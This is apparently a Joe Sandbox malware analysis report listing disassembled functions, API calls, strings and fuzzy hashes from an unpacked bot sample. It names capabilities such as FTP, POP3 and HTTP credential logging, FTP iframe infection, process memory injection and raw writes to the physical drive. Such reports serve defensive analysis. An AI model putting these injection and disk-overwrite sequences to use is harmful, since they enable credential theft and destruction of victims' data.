                                                                  control_flow_graph 26 3d5a20-3d5a31 call 3d35e0 29 3d5c49-3d5c4c 26->29 30 3d5a37-3d5a3e call 3d3a20 26->30 30->29 33 3d5a44-3d5a5b 30->33 34 3d5ae5-3d5b4a call 3d4d00 call 3d3080 * 2 33->34 35 3d5a61-3d5a68 33->35 53 3d5b4f-3d5b63 34->53 35->34 36 3d5a6a-3d5a76 35->36 36->34 38 3d5a78-3d5a7b call 3d3920 36->38 41 3d5a80-3d5a87 38->41 44 3d5a8d-3d5a97 41->44 45 3d5c46-3d5c48 41->45 47 3d5a9c-3d5aa0 44->47 48 3d5a99 44->48 45->29 49 3d5ad8-3d5ae3 47->49 50 3d5aa2-3d5aa5 47->50 48->47 49->34 49->38 52 3d5aaa-3d5aac 50->52 54 3d5aae-3d5ab1 52->54 55 3d5ab3 52->55 56 3d5b65-3d5b6c 53->56 57 3d5b70-3d5b85 53->57 58 3d5ab7-3d5ac2 call 3d3750 54->58 55->58 56->57 59 3d5bcc-3d5be5 57->59 60 3d5b87-3d5b8b 57->60 58->45 72 3d5ac8-3d5ad3 58->72 64 3d5bf4-3d5c0a CreateThread CloseHandle 59->64 65 3d5be7-3d5bf2 59->65 62 3d5b8d-3d5ba7 call 3d39a0 60->62 63 3d5bc3-3d5bca 60->63 62->63 76 3d5ba9-3d5bbf 62->76 63->59 63->60 66 3d5c0c-3d5c1f 64->66 65->64 65->66 70 3d5c2e-3d5c44 CreateThread CloseHandle 66->70 71 3d5c21-3d5c2c 66->71 70->45 71->45 71->70 74 3d5ad5 72->74 75 3d5aa7 72->75 74->49 75->52 76->63
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005070,00000000,00000000,00000000), ref: 003D5C03
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5C0A
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000050F0,00000000,00000000,00000000), ref: 003D5C3D
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D5C44
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleThread
                                                                  • String ID: LdrLoadDll$NtResumeThread$ntdll.dll
                                                                  • API String ID: 3032276028-1814628691
                                                                  • Opcode ID: 1904ec680757041d3d3c76c443b6ca2457345210af6d8384818ee27831ce4cae
                                                                  • Instruction ID: 0b689bcf191e0d56884bc566a038f67bac7e5eea288d365d2c188f22a5ac007a
                                                                  • Opcode Fuzzy Hash: 1904ec680757041d3d3c76c443b6ca2457345210af6d8384818ee27831ce4cae
                                                                  • Instruction Fuzzy Hash: 6861C276B40B12ABD722DF69EC81F6673A4BF44705F19462AE801EB781DB70F901CB94
                                                                  Function 003D4D00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: NtGetNextProcess$SeDebugPrivilege$ntdll.dll
                                                                  • API String ID: 0-503679825
                                                                  • Opcode ID: 5656a5c900e727bf9bcc59d0f0a1b90ce46cfdc831844284d81a52fb9108cc60
                                                                  • Instruction ID: 5f4df8b93ff072242dd5400ff2ced71cedcee5725f03e941c7bddaabf10b764c
                                                                  • Opcode Fuzzy Hash: 5656a5c900e727bf9bcc59d0f0a1b90ce46cfdc831844284d81a52fb9108cc60
                                                                  • Instruction Fuzzy Hash: A331CAB6F4421476D611BB75BD07FAE32589B44700F004566F844BB3C2EAB96A40C7AB
                                                                  Function 003D2F90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103injectionCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 132 3d2f90-3d2f9c 133 3d3074-3d307b 132->133 134 3d2fa2-3d2fa7 132->134 134->133 135 3d2fad-3d2fb2 134->135 135->133 136 3d2fb8-3d2fbc 135->136 136->133 137 3d2fc2-3d2fda ReadProcessMemory 136->137 138 3d306b-3d3073 137->138 139 3d2fe0-3d2ff6 call 3d2e40 137->139 139->138 142 3d2ff8-3d3020 call 3d2e20 WriteProcessMemory 139->142 142->138 145 3d3022-3d3026 142->145 145->138 146 3d3028-3d303a WriteProcessMemory 145->146 146->138 147 3d303c-3d3042 146->147 147->138 148 3d3044-3d3057 WriteProcessMemory 147->148 148->138 149 3d3059-3d305d 148->149 149->138 150 3d305f-3d306a 149->150
                                                                  APIs
                                                                  • ReadProcessMemory.KERNEL32(?,?,00000000,00000010,?), ref: 003D2FD2
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,00000020,?), ref: 003D301C
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000000,00000020), ref: 003D3036
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,00000000,00000004,00000020), ref: 003D3053
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcess$Write$Read
                                                                  • String ID:
                                                                  • API String ID: 2454571318-3916222277
                                                                  • Opcode ID: 69f1daaa7fd8d3f9ed07d2cbd1e46a4c6f3f7ca615fcb3ce0b166a4377613ab4
                                                                  • Instruction ID: e8e297a8ca37f5f6ceb3f8da02a6e275c7e161c783b05ca9a5a768d57a37ab86
                                                                  • Opcode Fuzzy Hash: 69f1daaa7fd8d3f9ed07d2cbd1e46a4c6f3f7ca615fcb3ce0b166a4377613ab4
                                                                  • Instruction Fuzzy Hash: 18314DB260050DABDB12DE99EC81EEFB37CEB40750F11416AE90696244E771AF46C7A2
                                                                  Function 003D4470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 151 3d4470-3d4488 152 3d448e-3d44e0 _snprintf OpenFileMappingA 151->152 153 3d4544-3d455b 151->153 154 3d4530-3d4535 152->154 155 3d44e2-3d4514 MapViewOfFile 152->155 156 3d4536-3d453d 155->156 157 3d4516-3d4528 CloseHandle 155->157 156->153 157->154
                                                                  APIs
                                                                  • _snprintf.MSVCRT(?,00000104,%s_%d,EDB88F28,00000000), ref: 003D44A7
                                                                  • OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 003D44BD
                                                                  • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 003D44F0
                                                                  • CloseHandle.KERNEL32(?), ref: 003D451B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: File$CloseHandleMappingOpenView_snprintf
                                                                  • String ID: %s_%d
                                                                  • API String ID: 460513966-1933919280
                                                                  • Opcode ID: fd7ef295c2662f94c463f328986799a26032d8f619bdb34b82d36f73aa8f7f6c
                                                                  • Instruction ID: e69c4309028f2da4d8288bfaec0a1655f1dfdbe9abbcd7a8493218098efb5d20
                                                                  • Opcode Fuzzy Hash: fd7ef295c2662f94c463f328986799a26032d8f619bdb34b82d36f73aa8f7f6c
                                                                  • Instruction Fuzzy Hash: FF21A4B26507068BD332CF18ED89B72B3E9EB84304F44867DE7469B285D779B860DB40

                                                                  Non-executed Functions

                                                                  Function 003DB480 Relevance: 66.9, APIs: 28, Strings: 10, Instructions: 363memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DB4A2
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                  • lstrcpyA.KERNEL32(?,003E1335), ref: 003DB51A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB536
                                                                  • GetVersionExA.KERNEL32(?), ref: 003DB550
                                                                  • lstrcpyA.KERNEL32(?,ERR), ref: 003DB5F5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB60D
                                                                  • strstr.MSVCRT(?,<br>), ref: 003DB641
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB650
                                                                  • lstrlenA.KERNEL32(-00000004), ref: 003DB65F
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 003DB67D
                                                                  • lstrcmpA.KERNEL32(-00000004,003E2BE4), ref: 003DB6A8
                                                                  • GetLocaleInfoA.KERNEL32(00000800,00000007,00000000,00000400), ref: 003DB6C5
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 003DB719
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB74A
                                                                    • Part of subcall function 003D1BA0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 003D1BC5
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB75B
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB76E
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000104), ref: 003DB781
                                                                  • _snprintf.MSVCRT(?,00000104,00000000), ref: 003DB796
                                                                  • _snprintf.MSVCRT(?,00000104,00000000,?,00000104,00000000), ref: 003DB7AB
                                                                  • lstrcpyA.KERNEL32(?,003E2C0C), ref: 003DB7CD
                                                                  • _snprintf.MSVCRT(00000000,00000104,n%s[%s{%s%s{%s,?,?,00000000,?,00000000), ref: 003DB7FC
                                                                  • _snprintf.MSVCRT(?,00000104,00000000,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000,00000000,00000104), ref: 003DB863
                                                                  • _snprintf.MSVCRT(?,00000104,00000000,?,00000104,00000000,?,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 003DB878
                                                                  • lstrcpyA.KERNEL32(?,003E2C0C), ref: 003DB89A
                                                                  • _snprintf.MSVCRT(00000000,00000104,n%s[%s{%s%s{%s,?,?,00000000,?,00000000), ref: 003DB8C9
                                                                  • _snprintf.MSVCRT(?,00000104,[%s{%s%s{%s,?,00000000,?,00000000), ref: 003DB8E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DB8F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: _snprintf$AllocHeap$lstrcpy$lstrlen$memset$InfoLocaleTime$??3@FileSystemVersion_vsnprintflstrcmpstrstr
                                                                  • String ID: 2K3$2K8$<br>$ERR$VIS$[%s{%s%s{%s$admin$http://api.wipmania.com/$isadmin$n%s[%s{%s%s{%s
                                                                  • API String ID: 124843797-3058427118
                                                                  • Opcode ID: 395398f7bcff38c7f7ee863d7b3f5fa021373231e6cd83360dd22deedb4a618f
                                                                  • Instruction ID: 14a15a0e2c4f920124a0fc0911c29cf54afa3cad54ccce06d7969ec76ed553c6
                                                                  • Opcode Fuzzy Hash: 395398f7bcff38c7f7ee863d7b3f5fa021373231e6cd83360dd22deedb4a618f
                                                                  • Instruction Fuzzy Hash: D4C198B2A40345EBD725DF91EC82FABB37DAB44704F118A1DF246AB6C0D7B0E9448B51
                                                                  Function 003D1EA0 Relevance: 37.7, APIs: 25, Instructions: 195fileencryptionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 003D1ECD
                                                                  • GetLastError.KERNEL32 ref: 003D1EDA
                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003D1EF5
                                                                  • GetLastError.KERNEL32 ref: 003D1EFF
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D1F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AcquireCloseContextCreateCryptFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2213256293-0
                                                                  • Opcode ID: b9d2c786335b69fb0a04ca0e46b5e3383b8c973c7ea5fdb5fb44f0e47d8cf51f
                                                                  • Instruction ID: 90d09c70d6c6af339e9db207b626b86daf518441ff91a8ca3621780f238f7b8c
                                                                  • Opcode Fuzzy Hash: b9d2c786335b69fb0a04ca0e46b5e3383b8c973c7ea5fdb5fb44f0e47d8cf51f
                                                                  • Instruction Fuzzy Hash: FB519276600148BFDB229BE5ECC8ABFB77CFB48355F10469AFA05D6280D7319D458B60
                                                                  Function 003DF130 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 122filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000105), ref: 003DF150
                                                                  • memset.MSVCRT(?,00000000,00000103,?,00000000,00000105), ref: 003DF168
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 003DF17B
                                                                    • Part of subcall function 003DEDF0: memset.MSVCRT(?,00000000,00000103), ref: 003DEE0E
                                                                    • Part of subcall function 003DEDF0: vsprintf.MSVCRT(00000000,?,?,?,00000000,00000103), ref: 003DEE22
                                                                    • Part of subcall function 003DEDF0: PathAppendA.SHLWAPI(?,00000000), ref: 003DEE35
                                                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 003DF196
                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 003DF1AA
                                                                  • CoInitialize.OLE32(00000000), ref: 003DF1C2
                                                                  • _snprintf.MSVCRT(?,00000103,%s%s,?,?), ref: 003DF1E1
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 003DF20C
                                                                  • strncmp.MSVCRT(?,RECYCLED,00000008), ref: 003DF22E
                                                                  • strstr.MSVCRT(?,.inf), ref: 003DF246
                                                                  • _snprintf.MSVCRT(?,00000103,%s%s,?,?), ref: 003DF26B
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 003DF290
                                                                  • FindClose.KERNEL32(?), ref: 003DF29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
                                                                  • String ID: %s%s$.inf$RECYCLED
                                                                  • API String ID: 3870971729-188919753
                                                                  • Opcode ID: 59944833ff28043b30fc7dd9f2d3cb69439a9be525716ddeec1880949ed48905
                                                                  • Instruction ID: a149ec8d79435b09dffbb3d3a51e8a2a0640e6ade0f8d7b68919a9ffb109d5fa
                                                                  • Opcode Fuzzy Hash: 59944833ff28043b30fc7dd9f2d3cb69439a9be525716ddeec1880949ed48905
                                                                  • Instruction Fuzzy Hash: 1F41857694025CABCB25DB61EC85FEF777CEB54700F044699F509AA180E670AFC5CB60
                                                                  Function 003D9D90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 003D9DA7
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 003D9DD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID: \\.\PHYSICALDRIVE0
                                                                  • API String ID: 1475775534-1557481562
                                                                  • Opcode ID: 6f966fa33e44b5f2417194169455bdd23e333a98e819208564a47128597c7606
                                                                  • Instruction ID: 13305672d5774a4c58a5fe915b218f2c2147ba27911b6f7557eab5f545635497
                                                                  • Opcode Fuzzy Hash: 6f966fa33e44b5f2417194169455bdd23e333a98e819208564a47128597c7606
                                                                  • Instruction Fuzzy Hash: 6731A9727803447AF63196A9AC86FEB775CD784B32F200357FB04E92C0DAA06D4446F4
                                                                  Function 003D9EC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF), ref: 003D9EDF
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 003D9F16
                                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 003D9F45
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 003D9F5A
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 003D9F74
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003D9F77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFile$CloseCreateHandleWritememset
                                                                  • String ID: 00100$U$\\.\PHYSICALDRIVE0
                                                                  • API String ID: 3939175881-3482488017
                                                                  • Opcode ID: d6d54b7e6a2de3262dd776393442ed5d645d6f708fc54ebc2c9516e00fa4bd8b
                                                                  • Instruction ID: 218d318ec77fac386faf29d594df5c34164e275ea4907bffb39abe86a1dfcc62
                                                                  • Opcode Fuzzy Hash: d6d54b7e6a2de3262dd776393442ed5d645d6f708fc54ebc2c9516e00fa4bd8b
                                                                  • Instruction Fuzzy Hash: 6C11C432BD03587AF731E6A49C4BFDA776C8B55B11F100295F714BE1C19AF02B4087A9
                                                                  Function 003DA550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,NtShutdownSystem), ref: 003DA57A
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 003DA58F
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 003DA5B3
                                                                  • GetLastError.KERNEL32 ref: 003DA5B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Token$AdjustErrorLastLookupOpenPrivilegePrivilegesProcessValue
                                                                  • String ID: NtShutdownSystem$SeShutdownPrivilege$ntdll.dll
                                                                  • API String ID: 137217592-1699316426
                                                                  • Opcode ID: 7b40da243514f1788fbe355eefdb7304f3e556978ee8eee6f20afb6959c6d006
                                                                  • Instruction ID: 73607b0d82aa17c7146041bd2361da0fa5101af808831b3eeaa0f54921d5f188
                                                                  • Opcode Fuzzy Hash: 7b40da243514f1788fbe355eefdb7304f3e556978ee8eee6f20afb6959c6d006
                                                                  • Instruction Fuzzy Hash: EDF04975A403547BD721EBE5AD4AFEF776C9B04701F500255F604E91C1DBB06E4487A2
                                                                  Function 003D42E0 Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70a4d7ca5b4fde14e6780c1c2c84dff7878e2e5d6c58e3e357a0f9246b13603c
                                                                  • Instruction ID: 1f0b4e5f9254636b1997e9f8193c5b414985657d637956b5f76bbe1a1aab72c1
                                                                  • Opcode Fuzzy Hash: 70a4d7ca5b4fde14e6780c1c2c84dff7878e2e5d6c58e3e357a0f9246b13603c
                                                                  • Instruction Fuzzy Hash: E23181B67002046BE7329B6EFC81F6BB3ADEB84711F15455AFD09DB380DA71EC1086A1
                                                                  Function 003DD7A0 Relevance: 154.5, APIs: 54, Strings: 34, Instructions: 473memorystringfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 608 3dd7a0-3dd802 HeapAlloc * 2 memset 609 3dd82b-3dd82d 608->609 610 3dd804-3dd806 608->610 611 3dd82f-3dd837 GetLastError 609->611 612 3dd84e-3dd850 609->612 613 3dd808-3dd80b HeapFree 610->613 614 3dd811-3dd813 610->614 615 3dd839-3dd83c HeapFree 611->615 616 3dd842-3dd84b 611->616 617 3dd86d-3dd882 ReadFile 612->617 618 3dd852-3dd86a GetLastError HeapFree 612->618 613->614 619 3dd81f-3dd828 614->619 620 3dd815-3dd819 HeapFree 614->620 615->616 621 3dd888 617->621 622 3ddcc1-3ddcca GetLastError 617->622 620->619 623 3dd890-3dd895 621->623 624 3ddccc GetLastError 622->624 625 3ddcd2-3ddcf0 FlushFileBuffers DisconnectNamedPipe CloseHandle 622->625 623->622 626 3dd89b-3dd8a6 623->626 624->625 627 3ddcfb-3ddd18 HeapFree * 2 625->627 628 3dd8cc-3dd8df atoi 626->628 629 3dd8a8-3dd8b0 626->629 631 3ddcf5-3ddcf8 628->631 632 3dd8e5-3dd8f4 strchr 628->632 630 3dd8b2-3dd8b7 629->630 635 3dd8b9-3dd8c0 630->635 636 3dd8c4 630->636 631->627 633 3dd8fa-3dd936 lstrlenA call 3d1440 HeapAlloc * 2 632->633 634 3ddcf2 632->634 640 3dd93c-3dd94b strchr 633->640 641 3ddc72-3ddc77 633->641 634->631 635->630 638 3dd8c2 635->638 636->628 638->628 640->641 642 3dd951-3dd983 lstrlenA lstrcpynA * 2 lstrcmpA 640->642 643 3ddc79-3ddc80 HeapFree 641->643 644 3ddc86-3ddc88 641->644 645 3dd9e8-3dd9f2 lstrcmpA 642->645 646 3dd985-3dd9b9 call 3dba00 lstrlenA HeapAlloc 642->646 643->644 647 3ddc8a-3ddc91 HeapFree 644->647 648 3ddc97-3ddcbb ReadFile 644->648 650 3dda58-3dda62 lstrcmpA 645->650 651 3dd9f4-3dda29 call 3dba00 lstrlenA HeapAlloc 645->651 657 3dd9dd-3dd9e3 646->657 658 3dd9bb-3dd9da lstrcpyA lstrcatA call 3d31a0 646->658 647->648 648->622 648->623 652 3dda64-3dda7e call 3dba00 650->652 653 3dda83-3dda8d lstrcmpA 650->653 662 3dda4d-3dda53 651->662 663 3dda2b-3dda4a lstrcpyA lstrcatA call 3d31a0 651->663 652->641 659 3dda8f-3ddaa9 call 3dba00 653->659 660 3ddaae-3ddab8 lstrcmpA 653->660 657->641 658->657 659->641 667 3ddb0f-3ddb19 lstrcmpA 660->667 668 3ddaba-3ddaec call 3dba00 lstrlenA HeapAlloc 660->668 662->641 663->662 670 3ddb1b-3ddb25 lstrcmpA 667->670 671 3ddb50-3ddb5a lstrcmpA 667->671 681 3ddaee-3ddb01 lstrcpyA call 3d31a0 668->681 682 3ddb04-3ddb0a 668->682 676 3ddb27-3ddb2c 670->676 677 3ddb31-3ddb4b call 3dba00 670->677 678 3ddb5c-3ddb75 call 3dba00 671->678 679 3ddb7a-3ddb84 lstrcmpA 671->679 676->641 677->641 678->641 685 3ddba5-3ddbaf lstrcmpA 679->685 686 3ddb86-3ddba0 call 3dba00 679->686 681->682 682->641 689 3ddbb1-3ddbcb call 3dba00 685->689 690 3ddbd0-3ddbda lstrcmpA 685->690 686->641 689->641 696 3ddbdc-3ddbf5 call 3dba00 690->696 697 3ddbf7-3ddc01 lstrcmpA 690->697 696->641 700 3ddc25-3ddc2f lstrcmpA 697->700 701 3ddc03-3ddc23 call 3dba00 697->701 704 3ddc46-3ddc50 lstrcmpA 700->704 705 3ddc31-3ddc44 call 3d7330 700->705 701->641 704->641 707 3ddc52-3ddc6c call 3dba00 704->707 705->641 707->641
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 003DD7C3
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000800), ref: 003DD7D2
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DD7EE
                                                                  • HeapFree.KERNEL32(?,?,00000000), ref: 003DD80B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD819
                                                                  • GetLastError.KERNEL32 ref: 003DD82F
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD83C
                                                                  • GetLastError.KERNEL32 ref: 003DD852
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DD85B
                                                                  • ReadFile.KERNEL32(?,00000000,00000800,00000000,00000000), ref: 003DD87A
                                                                  • atoi.MSVCRT(00000000), ref: 003DD8D3
                                                                  • strchr.MSVCRT(00000000,0000002E), ref: 003DD8E8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DD900
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 003DD924
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001), ref: 003DD930
                                                                  • strchr.MSVCRT(00000000,0000002E), ref: 003DD93F
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DD952
                                                                  • lstrcpynA.KERNEL32(00000000,00000001,00000000), ref: 003DD95E
                                                                  • lstrcpynA.KERNEL32(?,00000000,00000001), ref: 003DD96D
                                                                  • lstrcmpA.KERNEL32(?,ftplog), ref: 003DD97F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocFree$ErrorLastlstrcpynlstrlenstrchr$FileReadatoilstrcmpmemset
                                                                  • String ID: 0W>$30e44aa1$4W>$8W>$<W>$@W>$FTP -> $POP3 -> $[DNS]: Blocked DNS "%s"$[FTP Infect]: %s was iframed$[FTP Login]: %s$[HTTP Login]: %s$[HTTP Traffic]: %s$[HTTP]: %s$[MSN]: %s$[PDef+]: %s$[POP3 Login]: %s$[Ruskill]: Detected DNS: "%s"$[Ruskill]: Detected File: "%s"$[Ruskill]: Detected Reg: "%s"$blk$block$disable$dns$ftpinfect$ftplog$httplogin$httpspread$httptraff$msn$poplog$rdns$rreg$ruskill
                                                                  • API String ID: 1531277263-1463491000
                                                                  • Opcode ID: 5f53abe39b50baa8e0e1ee805948c55f117a3274bb869f86d829284142df5064
                                                                  • Instruction ID: 8fd7ece87feec81b6f62f21b64451cf7e3140fea68f673fed224e0f410836b78
                                                                  • Opcode Fuzzy Hash: 5f53abe39b50baa8e0e1ee805948c55f117a3274bb869f86d829284142df5064
                                                                  • Instruction Fuzzy Hash: CBE13476640694BBD7235BA5AC86FFF773CEF85744F11420AFA01AA3D1DBB09D0086A1
                                                                  Function 003E0430 Relevance: 112.3, APIs: 51, Strings: 13, Instructions: 334stringmemoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
